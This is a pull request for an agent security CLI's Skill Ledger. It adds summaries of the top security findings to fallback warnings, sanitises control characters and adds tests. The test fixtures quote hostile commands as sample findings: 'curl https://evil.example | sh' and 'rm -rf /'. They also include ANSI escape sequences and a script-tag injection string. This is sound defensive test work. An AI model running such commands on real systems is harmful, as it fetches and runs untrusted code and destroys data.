### PR TITLE
fix(sec-core): clarify skill ledger fallback warnings

### DIFF
--- a/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/decision.py
+++ b/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/decision.py
@@ -56,6 +56,20 @@ _TRUSTED_CURRENT_STATUSES = {"pass", "warn", "deny"}
 _ALLOWING_DECISIONS = {"allow", "always_allow", "rollback"}
 _ROOT_COPY_EXCLUDED = {SKILL_META_DIR, ".git"}
 _DECISION_LOCK = "decision.lock"
+_FINDING_SUMMARY_LIMIT = 3
+_FINDING_TEXT_LIMIT = 160
+_FINDING_LEVEL_RANK = {
+    "deny": 0,
+    "critical": 0,
+    "high": 0,
+    "warn": 1,
+    "warning": 1,
+    "medium": 1,
+    "low": 1,
+    "pass": 2,
+    "info": 2,
+    "informational": 2,
+}
 logger = logging.getLogger(__name__)
 
 
@@ -236,16 +250,19 @@ def show_skill(
         root_matches_active=root_matches_active,
         policy=resolved_policy,
     )
-    warnings = [summary["message"]] if summary["message"] is not None else []
+    findings = status_result.get("findings", [])
+    display_message = _message_with_findings(summary, findings)
+    warnings = [display_message] if display_message is not None else []
     return {
         **summary,
+        "message": display_message,
         "skillName": Path(skill_dir).name,
         "activationPolicy": resolved_policy,
         "latest": _manifest_summary(latest_manifest, status_result),
         "active": _manifest_summary(active_manifest, None),
         "rootMatchesActive": root_matches_active,
         "consistencyReason": consistency_reason,
-        "findings": status_result.get("findings", []),
+        "findings": findings,
         "warnings": warnings,
     }
 
@@ -502,6 +519,128 @@ def _show_consistency_reason(
             f"{active_version or 'none'}"
         )
     return None
+
+
+def _message_with_findings(
+    summary: dict[str, Any],
+    findings: Any,
+) -> str | None:
+    message = summary.get("message")
+    if not isinstance(message, str) or not message:
+        return None
+
+    reason_code = summary.get("reasonCode")
+    if reason_code not in {
+        "latest_risk_fallback_to_previous",
+        "latest_risk_pending_decision",
+    }:
+        findings_summary = _summarize_findings(findings)
+        if findings_summary:
+            return f"{message} Latest findings: {findings_summary}."
+        return message
+
+    latest_version = _display_value(summary.get("latestVersionId"))
+    latest_status = _display_value(summary.get("latestStatus"), default="unknown")
+    active_version = summary.get("activeVersionId")
+    if isinstance(active_version, str) and active_version:
+        active_clause = f"current active version is {active_version}"
+        action_clause = (
+            "Review hidden latest with export --version latest, then decide: "
+            f"block, rollback --version {active_version}, or allow after review."
+        )
+    else:
+        active_clause = "no active safe version is exposed yet"
+        action_clause = (
+            "Review hidden latest with export --version latest, then decide: "
+            "block or allow after review."
+        )
+
+    parts = [
+        f"Latest version {latest_version} is {latest_status} and is not exposed; "
+        f"{active_clause}."
+    ]
+    findings_summary = _summarize_findings(findings)
+    if findings_summary:
+        parts.append(f"Latest findings: {findings_summary}.")
+    parts.append(action_clause)
+    return " ".join(parts)
+
+
+def _summarize_findings(findings: Any) -> str | None:
+    if not isinstance(findings, list):
+        return None
+    displayable = [finding for finding in findings if isinstance(finding, dict)]
+    if not displayable:
+        return None
+
+    ranked = sorted(
+        enumerate(displayable),
+        key=lambda item: (_finding_level_rank(item[1]), item[0]),
+    )
+    selected = [finding for _, finding in ranked[:_FINDING_SUMMARY_LIMIT]]
+    entries = [_format_finding_summary(finding) for finding in selected]
+    entries = [entry for entry in entries if entry]
+    if not entries:
+        return None
+    remaining = len(displayable) - len(selected)
+    if remaining > 0:
+        entries.append(f"+{remaining} more findings")
+    return "; ".join(entries)
+
+
+def _finding_level_rank(finding: dict[str, Any]) -> int:
+    level = _finding_field(finding, "level") or _finding_field(finding, "severity")
+    return _FINDING_LEVEL_RANK.get(level.lower(), 3) if level else 3
+
+
+def _format_finding_summary(finding: dict[str, Any]) -> str | None:
+    level = _finding_field(finding, "level") or _finding_field(finding, "severity")
+    if not level:
+        level = "unknown"
+    location = _finding_field(finding, "file") or _finding_field(finding, "path")
+    rule = (
+        _finding_field(finding, "rule")
+        or _finding_field(finding, "rule_id")
+        or _finding_field(finding, "title")
+    )
+    message = _finding_field(finding, "message") or _finding_field(
+        finding, "description"
+    )
+
+    prefix_parts = [f"[{level}]"]
+    if location:
+        prefix_parts.append(location)
+    if rule:
+        prefix_parts.append(rule)
+    text = " ".join(prefix_parts)
+    if message:
+        text = f"{text}: {message}"
+    return _truncate_finding_part(text)
+
+
+def _finding_field(finding: dict[str, Any], key: str) -> str | None:
+    value = finding.get(key)
+    if value is None:
+        metadata = finding.get("metadata")
+        if isinstance(metadata, dict):
+            value = metadata.get(key)
+    if value is None:
+        return None
+    text = str(value).strip()
+    return text or None
+
+
+def _truncate_finding_part(text: str) -> str:
+    if len(text) <= _FINDING_TEXT_LIMIT:
+        return text
+    return text[: _FINDING_TEXT_LIMIT - 3].rstrip() + "..."
+
+
+def _display_value(value: Any, *, default: str = "none") -> str:
+    if value is None:
+        return default
+    text = str(value).strip()
+    return text or default
 
 
 def _newest_trusted_decision(

--- a/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/decision.py
+++ b/src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/decision.py
@@ -626,8 +626,15 @@ def _finding_field(finding: dict[str, Any], key: str) -> str | None:
             value = metadata.get(key)
     if value is None:
         return None
-    text = str(value).strip()
+    text = _sanitize_finding_text(str(value))
     return text or None
+
+
+def _sanitize_finding_text(text: str) -> str:
+    safe_chars = [
+        " " if ord(char) < 0x20 or 0x7F <= ord(char) <= 0x9F else char for char in text
+    ]
+    return " ".join("".join(safe_chars).split())
 
 
 def _truncate_finding_part(text: str) -> str:

--- a/src/agent-sec-core/openclaw-plugin/tests/unit/skill-ledger-test.ts
+++ b/src/agent-sec-core/openclaw-plugin/tests/unit/skill-ledger-test.ts
@@ -434,6 +434,33 @@ describe("skill-ledger", () => {
     });
   }
 
+  it("includes finding summary in deny approval while keeping critical severity", async () => {
+    const message =
+      "Latest version v000002 is deny and is not exposed; current active version is v000001. " +
+      "Latest findings: [deny] danger.sh danger-shell: executes curl https://evil.example | sh. " +
+      "Review hidden latest with export --version latest, then decide: block, rollback --version v000001, or allow after review.";
+    mockSkillLedgerCheck({
+      exitCode: 0,
+      stdout: JSON.stringify({
+        latestStatus: "deny",
+        message,
+      }),
+      stderr: "",
+    });
+    const { beforeToolCall } = registerHandlers();
+
+    const result = await beforeToolCall.handler(
+      readSkillEvent("/skills/deny/SKILL.md"),
+      {},
+    );
+
+    assert.equal(result?.requireApproval?.title, "Skill Ledger Security Check");
+    assert.match(result?.requireApproval?.description, /danger\.sh/);
+    assert.match(result?.requireApproval?.description, /curl https:\/\/evil\.example \| sh/);
+    assert.match(result?.requireApproval?.description, /rollback --version v000001/);
+    assert.equal(result?.requireApproval?.severity, "critical");
+  });
+
   for (const status of ["none", "drifted", "deny", "tampered"]) {
     it(`${status} logs debug and allows with debug policy`, async () => {
       mockSkillLedgerStatus(status, status === "none" ? 0 : 1);

--- a/src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py
+++ b/src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py
@@ -2459,6 +2459,48 @@ def test_show_findings_summary_handles_missing_fields_and_empty_findings(ws):
     assert "Latest findings:" not in drifted_out["message"]
 
 
+def test_show_findings_summary_strips_control_characters(ws):
+    skill = make_skill(
+        ws.skills_dir, "decision-show-control-findings", {"data.txt": "v1"}
+    )
+    env = ws.env()
+    pass_findings = write_findings_file(
+        ws.fixtures,
+        "decision-show-control-pass.json",
+        [{"rule": "ok", "level": "pass", "message": "pass"}],
+    )
+    deny_findings = write_findings_file(
+        ws.fixtures,
+        "decision-show-control-deny.json",
+        [
+            {
+                "rule": "ansi\x1b]0;owned\x07rule",
+                "level": "deny",
+                "file": "danger\x1b[2J.sh",
+                "message": "line1\nline2\t\x00<script>alert(1)</script>\x9b",
+            }
+        ],
+    )
+
+    run_skill_ledger(
+        ["certify", str(skill), "--findings", str(pass_findings)], env_extra=env
+    )
+    (skill / "data.txt").write_text("v2 risky")
+    run_skill_ledger(
+        ["certify", str(skill), "--findings", str(deny_findings)], env_extra=env
+    )
+
+    r = run_skill_ledger(["show", str(skill), "--policy", "pass_only"], env_extra=env)
+    assert r.returncode == 0, f"show exit {r.returncode}: {r.stderr}"
+    out = parse_json_output(r.stdout)
+    message = out["message"]
+
+    assert message is not None
+    assert "Latest findings:" in message
+    assert "line1 line2 <script>alert(1)</script>" in message
+    assert not any(ord(ch) < 0x20 or 0x7F <= ord(ch) <= 0x9F for ch in message)
+
+
 def test_show_reuses_exposure_summary_check_result(ws, monkeypatch):
     """show should not check the same skill once directly and once via summary."""
     skill = make_skill(ws.skills_dir, "decision-show-single-check", {"data.txt": "v1"})

--- a/src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py
+++ b/src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py
@@ -2333,7 +2333,31 @@ def test_show_reports_active_latest_decision_and_root_match(ws):
     deny_findings = write_findings_file(
         ws.fixtures,
         "decision-show-deny.json",
-        [{"rule": "deny", "level": "deny", "message": "deny"}],
+        [
+            {
+                "rule": "danger-shell",
+                "level": "deny",
+                "file": "danger.sh",
+                "message": "executes curl https://evil.example | sh",
+            },
+            {
+                "rule": "recursive-delete",
+                "level": "deny",
+                "file": "cleanup.sh",
+                "message": "runs rm -rf /",
+            },
+            {
+                "rule": "broad-permission",
+                "level": "warn",
+                "path": "notes.md",
+                "message": "asks for broad permissions",
+            },
+            {
+                "rule": "informational",
+                "level": "pass",
+                "message": "informational finding",
+            },
+        ],
     )
     run_skill_ledger(
         ["certify", str(skill), "--findings", str(pass_findings)], env_extra=env
@@ -2359,7 +2383,80 @@ def test_show_reports_active_latest_decision_and_root_match(ws):
     assert out["rootMatchesActive"] is False
     assert out["activationPolicy"] == "pass_warn_only"
     assert "active version is v000001" in out["consistencyReason"]
+    assert "Latest version v000002 is deny and is not exposed" in out["message"]
+    assert "current active version is v000001" in out["message"]
+    assert "Latest findings:" in out["message"]
+    assert (
+        "[deny] danger.sh danger-shell: executes curl https://evil.example | sh"
+        in out["message"]
+    )
+    assert "[deny] cleanup.sh recursive-delete: runs rm -rf /" in out["message"]
+    assert (
+        "[warn] notes.md broad-permission: asks for broad permissions" in out["message"]
+    )
+    assert "+1 more findings" in out["message"]
+    assert "export --version latest" in out["message"]
+    assert "rollback --version v000001" in out["message"]
+    assert "allow after review" in out["message"]
     assert out["warnings"]
+    assert out["warnings"] == [out["message"]]
+
+
+def test_show_findings_summary_handles_missing_fields_and_empty_findings(ws):
+    skill = make_skill(
+        ws.skills_dir, "decision-show-missing-findings", {"data.txt": "v1"}
+    )
+    env = ws.env()
+    pass_findings = write_findings_file(
+        ws.fixtures,
+        "decision-show-missing-fields-pass.json",
+        [{"rule": "ok", "level": "pass", "message": "pass"}],
+    )
+    deny_findings = write_findings_file(
+        ws.fixtures,
+        "decision-show-missing-fields-deny.json",
+        [
+            {
+                "rule": "message-only",
+                "level": "deny",
+                "message": "message without file",
+            },
+            {"rule": "path-only", "level": "warn", "path": "danger.sh"},
+        ],
+    )
+    run_skill_ledger(
+        ["certify", str(skill), "--findings", str(pass_findings)], env_extra=env
+    )
+    (skill / "data.txt").write_text("v2 risky")
+    run_skill_ledger(
+        ["certify", str(skill), "--findings", str(deny_findings)], env_extra=env
+    )
+
+    r = run_skill_ledger(["show", str(skill)], env_extra=env)
+    assert r.returncode == 0, f"show exit {r.returncode}: {r.stderr}"
+    out = parse_json_output(r.stdout)
+    assert "[deny] message-only: message without file" in out["message"]
+    assert "[warn] danger.sh path-only" in out["message"]
+
+    drifted_skill = make_skill(
+        ws.skills_dir, "decision-show-drifted", {"data.txt": "v1"}
+    )
+    drifted_findings = write_findings_file(
+        ws.fixtures,
+        "decision-show-drifted-pass.json",
+        [{"rule": "ok", "level": "pass", "message": "pass"}],
+    )
+    run_skill_ledger(
+        ["certify", str(drifted_skill), "--findings", str(drifted_findings)],
+        env_extra=env,
+    )
+    (drifted_skill / "data.txt").write_text("v2 drifted")
+
+    drifted = run_skill_ledger(["show", str(drifted_skill)], env_extra=env)
+    assert drifted.returncode == 0, f"show exit {drifted.returncode}: {drifted.stderr}"
+    drifted_out = parse_json_output(drifted.stdout)
+    assert drifted_out["latestStatus"] == "drifted"
+    assert "Latest findings:" not in drifted_out["message"]
 
 
 def test_show_reuses_exposure_summary_check_result(ws, monkeypatch):
@@ -3003,6 +3100,10 @@ def test_resolve_pass_warn_only_uses_pending_stub_without_pass_or_warn_snapshot(
     assert shown["userDecision"] is None
     assert shown["reasonCode"] == "latest_risk_pending_decision"
     assert shown["message"] is not None
+    assert "Latest version v000001 is deny and is not exposed" in shown["message"]
+    assert "no active safe version is exposed yet" in shown["message"]
+    assert "Latest findings: [deny] deny: deny" in shown["message"]
+    assert "export --version latest" in shown["message"]
 
 
 def test_resolve_legacy_latest_scanned_excludes_none_snapshot(ws):


### PR DESCRIPTION
## Description

Clarifies the Skill Ledger `show` message used by OpenClaw approval dialogs when the latest risky skill version is hidden behind a safe fallback. The message now states that the risky latest version is not exposed, identifies the currently active safe version or pending-review state, includes a Top 3 findings summary, and points users toward `export --version latest` plus the relevant decision actions.

The OpenClaw severity mapping is unchanged: `latestStatus=deny/tampered` still surfaces as `critical`.

## Related Issue

no-issue: requested Skill Ledger fallback warning clarification for agent-sec-core v0.7.0

## Type of Change

- [x] Bug fix (non-breaking change that fixes an issue)
- [ ] New feature (non-breaking change that adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Documentation update
- [ ] Refactoring (no functional change)
- [ ] Performance improvement
- [ ] CI/CD or build changes

## Scope

- [ ] `cosh` (copilot-shell)
- [x] `sec-core` (agent-sec-core)
- [ ] `skill` (os-skills)
- [ ] `sight` (agentsight)
- [ ] `tokenless` (tokenless)
- [ ] `ckpt` (ws-ckpt)
- [ ] `memory` (agent-memory)
- [ ] `anolisa` (anolisa-cli)
- [ ] `skillfs` (SkillFS)
- [ ] Multiple / Project-wide

## Checklist

- [x] I have read the [Contributing Guide](../CONTRIBUTING.md)
- [x] My code follows the project's code style
- [x] I have added tests that prove my fix is effective or that my feature works
- [ ] I have updated the documentation accordingly
- [ ] For `cosh`: Lint passes, type check passes, and tests pass
- [ ] For `sec-core` (Rust): `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [x] For `sec-core` (Python): Ruff format and pytest pass
- [ ] For `skill`: Skill directory structure is valid and shell scripts pass syntax check
- [ ] For `sight`: `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [ ] For `tokenless`: `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [ ] For `memory` (Linux only): `cargo clippy --all-targets -- -D warnings`, `cargo fmt --check`, and `cargo test` pass
- [ ] For `anolisa`: `cargo clippy --all-targets --locked -- -D warnings`, `cargo fmt --all --check`, and `cargo test --locked` pass
- [ ] For `skillfs`: `cargo fmt --all --check`, `cargo clippy --workspace --all-targets -- -D warnings`, and `cargo test --workspace` pass
- [ ] Lock files are up to date (`package-lock.json` / `Cargo.lock`)

## Testing

- `uv run --project src/agent-sec-core/agent-sec-cli pytest src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py -q`
- `uv run --project src/agent-sec-core/agent-sec-cli pytest src/agent-sec-core/tests/unit-test/skill_ledger -q`
- `uv run --project src/agent-sec-core/agent-sec-cli ruff check src/agent-sec-core/agent-sec-cli/src/agent_sec_cli/skill_ledger/core/decision.py src/agent-sec-core/tests/integration-test/skill-ledger/test_skill_ledger_integration.py`
- `env npm_config_offline=true npm run build` from `src/agent-sec-core/openclaw-plugin`
- `env npm_config_offline=true ./node_modules/.bin/tsc --noEmit --target ES2022 --module NodeNext --moduleResolution NodeNext --types node --skipLibCheck tests/unit/skill-ledger-test.ts`
- `git diff --check`

## Additional Notes

The OpenClaw `tsx` unit test runner did not run in the local Codex sandbox: `tsx` was killed with exit 137, and the alternate `node --import tsx --test ...` path failed with `TransformError: The service was stopped`. The modified TypeScript test was type-checked directly, and the OpenClaw plugin build passed.
